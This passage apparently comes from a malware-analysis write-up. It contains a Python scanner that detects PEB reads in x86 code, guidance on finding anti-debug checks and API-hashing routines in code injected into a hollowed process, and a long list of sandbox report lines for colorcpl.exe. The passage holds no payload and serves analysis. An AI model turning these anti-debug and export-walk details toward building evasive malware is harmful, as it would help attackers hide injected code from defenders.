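# PEB fields commonly consulted right after the load (offsets from the 32-bit PEB base).
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}

# Opcode bytes that may precede a [base+disp8] modrm in the follow-on access
# (mov, cmp, test, lea; B6/BE are the second byte of 0F B6 movzx / 0F BE movsx).
FOLLOW_OPCODES = {0x8B, 0x8A, 0x80, 0xF6, 0x39, 0x3B, 0x8D, 0xB6, 0xBE}


def _direct_patterns():
    """Encodings of `mov r32, dword ptr fs:[30h]`; yields (bytes, destination register)."""
    yield b"\x64\xA1\x30\x00\x00\x00", "eax"  # moffs32 short form, eax only
    for i, reg in enumerate(REGS32):  # 64 8B /r disp32: modrm mod=00, rm=101, reg=dst
        yield b"\x64\x8B" + bytes([0x05 | (i << 3)]) + b"\x30\x00\x00\x00", reg


def _teb_patterns():
    """TEB route: `mov r32, fs:[18h]` (TEB self pointer) then `mov r32, [r32+30h]` (TEB.ProcessEnvironmentBlock)."""
    yield b"\x64\xA1\x18\x00\x00\x00" + b"\x8B\x40\x30", "eax"
    for i, reg in enumerate(REGS32):
        if i == 4:  # esp as base would need a SIB byte; skip it
            continue
        load = b"\x64\x8B" + bytes([0x05 | (i << 3)]) + b"\x18\x00\x00\x00"
        deref = b"\x8B" + bytes([0x40 | (i << 3) | i]) + b"\x30"  # modrm mod=01, reg=rm=i, disp8
        yield load + deref, reg


def _field_after(buf, pos, base_idx, window=12):
    """Heuristic: first [base+disp8] access within `window` bytes after the PEB load, named as a PEB field."""
    chunk = buf[pos:pos + window]
    for j in range(len(chunk) - 2):
        op, modrm, disp = chunk[j], chunk[j + 1], chunk[j + 2]
        # mod=01 (disp8) and rm == the register that now holds the PEB pointer
        if op in FOLLOW_OPCODES and (modrm & 0xC7) == (0x40 | base_idx):
            return PEB_FIELDS.get(disp, "offset 0x%02X" % disp)
    return None


def scan_peb_reads(buf):
    """Return PEB-read hits as dicts {offset, reg, route, field}, sorted by offset."""
    hits = []
    for pats, route in ((_direct_patterns(), "fs:[30h]"), (_teb_patterns(), "fs:[18h]->[+30h]")):
        for pat, reg in pats:
            for m in re.finditer(re.escape(pat), buf):
                hits.append({"offset": m.start(), "reg": reg, "route": route,
                             "field": _field_after(buf, m.end(), REGS32.index(reg))})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed sample buffer (not from the analyzed file): three PEB reads with typical follow-ons.
SAMPLE = (
    b"\x90\x90"
    + b"\x64\xA1\x30\x00\x00\x00" + b"\x0F\xB6\x40\x02" + b"\x85\xC0"   # mov eax,fs:[30h]; movzx eax,byte [eax+2]; test eax,eax
    + b"\x90\x90\x90"
    + b"\x64\x8B\x0D\x30\x00\x00\x00" + b"\x8B\x49\x0C"                  # mov ecx,fs:[30h]; mov ecx,[ecx+0Ch]  (PEB.Ldr)
    + b"\x90\x90\x90"
    + b"\x64\xA1\x18\x00\x00\x00" + b"\x8B\x40\x30" + b"\x8B\x40\x68"    # mov eax,fs:[18h]; mov eax,[eax+30h]; mov eax,[eax+68h]
    + b"\xCC\xCC"
)

if __name__ == "__main__":
    for h in scan_peb_reads(SAMPLE):
        print("0x%04X  %-3s  %-17s  -> %s" % (h["offset"], h["reg"], h["route"], h["field"]))
```

Run it against an unpacked region dumped from the hollowed process (the report's 7_2_* and 15_2_* addresses are in such regions) rather than the on-disk file, since the PE on disk is a .NET loader and the fs:[30h] reads only appear in the injected native code. Hits whose follow-on field is BeingDebugged or NtGlobalFlag are the anti-debug checks; hits leading to Ldr are the start of a manual export walk and are the better place to set a breakpoint when recovering the API-hashing routine.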
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A44B mov eax, dword ptr fs:[00000030h] 15_2_0444A44B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04430050 mov eax, dword ptr fs:[00000030h] 15_2_04430050
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04430050 mov eax, dword ptr fs:[00000030h] 15_2_04430050
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AC450 mov eax, dword ptr fs:[00000030h] 15_2_044AC450
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AC450 mov eax, dword ptr fs:[00000030h] 15_2_044AC450
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443746D mov eax, dword ptr fs:[00000030h] 15_2_0443746D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E1074 mov eax, dword ptr fs:[00000030h] 15_2_044E1074
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D2073 mov eax, dword ptr fs:[00000030h] 15_2_044D2073
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E740D mov eax, dword ptr fs:[00000030h] 15_2_044E740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E740D mov eax, dword ptr fs:[00000030h] 15_2_044E740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E740D mov eax, dword ptr fs:[00000030h] 15_2_044E740D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h] 15_2_04496C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h] 15_2_04496C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h] 15_2_04496C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496C0A mov eax, dword ptr fs:[00000030h] 15_2_04496C0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D1C06 mov eax, dword ptr fs:[00000030h] 15_2_044D1C06
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E4015 mov eax, dword ptr fs:[00000030h] 15_2_044E4015
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E4015 mov eax, dword ptr fs:[00000030h] 15_2_044E4015
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497016 mov eax, dword ptr fs:[00000030h] 15_2_04497016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497016 mov eax, dword ptr fs:[00000030h] 15_2_04497016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04497016 mov eax, dword ptr fs:[00000030h] 15_2_04497016
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h] 15_2_0442B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h] 15_2_0442B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h] 15_2_0442B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442B02A mov eax, dword ptr fs:[00000030h] 15_2_0442B02A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444BC2C mov eax, dword ptr fs:[00000030h] 15_2_0444BC2C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8CD6 mov eax, dword ptr fs:[00000030h] 15_2_044E8CD6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov ecx, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AB8D0 mov eax, dword ptr fs:[00000030h] 15_2_044AB8D0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D14FB mov eax, dword ptr fs:[00000030h] 15_2_044D14FB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496CF0 mov eax, dword ptr fs:[00000030h] 15_2_04496CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496CF0 mov eax, dword ptr fs:[00000030h] 15_2_04496CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04496CF0 mov eax, dword ptr fs:[00000030h] 15_2_04496CF0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419080 mov eax, dword ptr fs:[00000030h] 15_2_04419080
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04493884 mov eax, dword ptr fs:[00000030h] 15_2_04493884
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04493884 mov eax, dword ptr fs:[00000030h] 15_2_04493884
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442849B mov eax, dword ptr fs:[00000030h] 15_2_0442849B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044590AF mov eax, dword ptr fs:[00000030h] 15_2_044590AF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444F0BF mov ecx, dword ptr fs:[00000030h] 15_2_0444F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444F0BF mov eax, dword ptr fs:[00000030h] 15_2_0444F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444F0BF mov eax, dword ptr fs:[00000030h] 15_2_0444F0BF
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04453D43 mov eax, dword ptr fs:[00000030h] 15_2_04453D43
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443B944 mov eax, dword ptr fs:[00000030h] 15_2_0443B944
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443B944 mov eax, dword ptr fs:[00000030h] 15_2_0443B944
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04493540 mov eax, dword ptr fs:[00000030h] 15_2_04493540
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04437D50 mov eax, dword ptr fs:[00000030h] 15_2_04437D50
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441C962 mov eax, dword ptr fs:[00000030h] 15_2_0441C962
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441B171 mov eax, dword ptr fs:[00000030h] 15_2_0441B171
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441B171 mov eax, dword ptr fs:[00000030h] 15_2_0441B171
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443C577 mov eax, dword ptr fs:[00000030h] 15_2_0443C577
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443C577 mov eax, dword ptr fs:[00000030h] 15_2_0443C577
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419100 mov eax, dword ptr fs:[00000030h] 15_2_04419100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419100 mov eax, dword ptr fs:[00000030h] 15_2_04419100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419100 mov eax, dword ptr fs:[00000030h] 15_2_04419100
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 mov eax, dword ptr fs:[00000030h] 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 mov eax, dword ptr fs:[00000030h] 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 mov eax, dword ptr fs:[00000030h] 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 mov eax, dword ptr fs:[00000030h] 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04434120 mov ecx, dword ptr fs:[00000030h] 15_2_04434120
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441AD30 mov eax, dword ptr fs:[00000030h] 15_2_0441AD30
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04423D34 mov eax, dword ptr fs:[00000030h] 15_2_04423D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8D34 mov eax, dword ptr fs:[00000030h] 15_2_044E8D34
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444513A mov eax, dword ptr fs:[00000030h] 15_2_0444513A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444513A mov eax, dword ptr fs:[00000030h] 15_2_0444513A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0449A537 mov eax, dword ptr fs:[00000030h] 15_2_0449A537
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04444D3B mov eax, dword ptr fs:[00000030h] 15_2_04444D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04444D3B mov eax, dword ptr fs:[00000030h] 15_2_04444D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04444D3B mov eax, dword ptr fs:[00000030h] 15_2_04444D3B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441B1E1 mov eax, dword ptr fs:[00000030h] 15_2_0441B1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441B1E1 mov eax, dword ptr fs:[00000030h] 15_2_0441B1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441B1E1 mov eax, dword ptr fs:[00000030h] 15_2_0441B1E1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044A41E8 mov eax, dword ptr fs:[00000030h] 15_2_044A41E8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442D5E0 mov eax, dword ptr fs:[00000030h] 15_2_0442D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442D5E0 mov eax, dword ptr fs:[00000030h] 15_2_0442D5E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044C8DF1 mov eax, dword ptr fs:[00000030h] 15_2_044C8DF1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A185 mov eax, dword ptr fs:[00000030h] 15_2_0444A185
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443C182 mov eax, dword ptr fs:[00000030h] 15_2_0443C182
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h] 15_2_04412D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h] 15_2_04412D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h] 15_2_04412D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h] 15_2_04412D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04412D8A mov eax, dword ptr fs:[00000030h] 15_2_04412D8A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444FD9B mov eax, dword ptr fs:[00000030h] 15_2_0444FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444FD9B mov eax, dword ptr fs:[00000030h] 15_2_0444FD9B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044461A0 mov eax, dword ptr fs:[00000030h] 15_2_044461A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044461A0 mov eax, dword ptr fs:[00000030h] 15_2_044461A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044435A1 mov eax, dword ptr fs:[00000030h] 15_2_044435A1
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04441DB5 mov eax, dword ptr fs:[00000030h] 15_2_04441DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04441DB5 mov eax, dword ptr fs:[00000030h] 15_2_04441DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04441DB5 mov eax, dword ptr fs:[00000030h] 15_2_04441DB5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419240 mov eax, dword ptr fs:[00000030h] 15_2_04419240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419240 mov eax, dword ptr fs:[00000030h] 15_2_04419240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419240 mov eax, dword ptr fs:[00000030h] 15_2_04419240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04419240 mov eax, dword ptr fs:[00000030h] 15_2_04419240
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04427E41 mov eax, dword ptr fs:[00000030h] 15_2_04427E41
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044A4257 mov eax, dword ptr fs:[00000030h] 15_2_044A4257
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044CB260 mov eax, dword ptr fs:[00000030h] 15_2_044CB260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044CB260 mov eax, dword ptr fs:[00000030h] 15_2_044CB260
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8A62 mov eax, dword ptr fs:[00000030h] 15_2_044E8A62
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442766D mov eax, dword ptr fs:[00000030h] 15_2_0442766D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h] 15_2_0443AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h] 15_2_0443AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h] 15_2_0443AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h] 15_2_0443AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443AE73 mov eax, dword ptr fs:[00000030h] 15_2_0443AE73
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0445927A mov eax, dword ptr fs:[00000030h] 15_2_0445927A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441C600 mov eax, dword ptr fs:[00000030h] 15_2_0441C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441C600 mov eax, dword ptr fs:[00000030h] 15_2_0441C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441C600 mov eax, dword ptr fs:[00000030h] 15_2_0441C600
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04448E00 mov eax, dword ptr fs:[00000030h] 15_2_04448E00
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04428A0A mov eax, dword ptr fs:[00000030h] 15_2_04428A0A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A61C mov eax, dword ptr fs:[00000030h] 15_2_0444A61C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A61C mov eax, dword ptr fs:[00000030h] 15_2_0444A61C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04433A1C mov eax, dword ptr fs:[00000030h] 15_2_04433A1C
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441E620 mov eax, dword ptr fs:[00000030h] 15_2_0441E620
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044CFE3F mov eax, dword ptr fs:[00000030h] 15_2_044CFE3F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04458EC7 mov eax, dword ptr fs:[00000030h] 15_2_04458EC7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044436CC mov eax, dword ptr fs:[00000030h] 15_2_044436CC
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044CFEC0 mov eax, dword ptr fs:[00000030h] 15_2_044CFEC0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8ED6 mov eax, dword ptr fs:[00000030h] 15_2_044E8ED6
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044276E2 mov eax, dword ptr fs:[00000030h] 15_2_044276E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044416E0 mov ecx, dword ptr fs:[00000030h] 15_2_044416E0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AFE87 mov eax, dword ptr fs:[00000030h] 15_2_044AFE87
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444D294 mov eax, dword ptr fs:[00000030h] 15_2_0444D294
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444D294 mov eax, dword ptr fs:[00000030h] 15_2_0444D294
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h] 15_2_044152A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h] 15_2_044152A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h] 15_2_044152A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h] 15_2_044152A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044152A5 mov eax, dword ptr fs:[00000030h] 15_2_044152A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E0EA5 mov eax, dword ptr fs:[00000030h] 15_2_044E0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E0EA5 mov eax, dword ptr fs:[00000030h] 15_2_044E0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E0EA5 mov eax, dword ptr fs:[00000030h] 15_2_044E0EA5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044946A7 mov eax, dword ptr fs:[00000030h] 15_2_044946A7
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442AAB0 mov eax, dword ptr fs:[00000030h] 15_2_0442AAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442AAB0 mov eax, dword ptr fs:[00000030h] 15_2_0442AAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444FAB0 mov eax, dword ptr fs:[00000030h] 15_2_0444FAB0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441DB40 mov eax, dword ptr fs:[00000030h] 15_2_0441DB40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442EF40 mov eax, dword ptr fs:[00000030h] 15_2_0442EF40
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8B58 mov eax, dword ptr fs:[00000030h] 15_2_044E8B58
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441F358 mov eax, dword ptr fs:[00000030h] 15_2_0441F358
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0441DB60 mov ecx, dword ptr fs:[00000030h] 15_2_0441DB60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0442FF60 mov eax, dword ptr fs:[00000030h] 15_2_0442FF60
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E8F6A mov eax, dword ptr fs:[00000030h] 15_2_044E8F6A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04443B7A mov eax, dword ptr fs:[00000030h] 15_2_04443B7A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04443B7A mov eax, dword ptr fs:[00000030h] 15_2_04443B7A
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E070D mov eax, dword ptr fs:[00000030h] 15_2_044E070D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044E070D mov eax, dword ptr fs:[00000030h] 15_2_044E070D
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A70E mov eax, dword ptr fs:[00000030h] 15_2_0444A70E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444A70E mov eax, dword ptr fs:[00000030h] 15_2_0444A70E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0443F716 mov eax, dword ptr fs:[00000030h] 15_2_0443F716
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044D131B mov eax, dword ptr fs:[00000030h] 15_2_044D131B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AFF10 mov eax, dword ptr fs:[00000030h] 15_2_044AFF10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_044AFF10 mov eax, dword ptr fs:[00000030h] 15_2_044AFF10
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04414F2E mov eax, dword ptr fs:[00000030h] 15_2_04414F2E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_04414F2E mov eax, dword ptr fs:[00000030h] 15_2_04414F2E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0444E730 mov eax, dword ptr fs:[00000030h] 15_2_0444E730
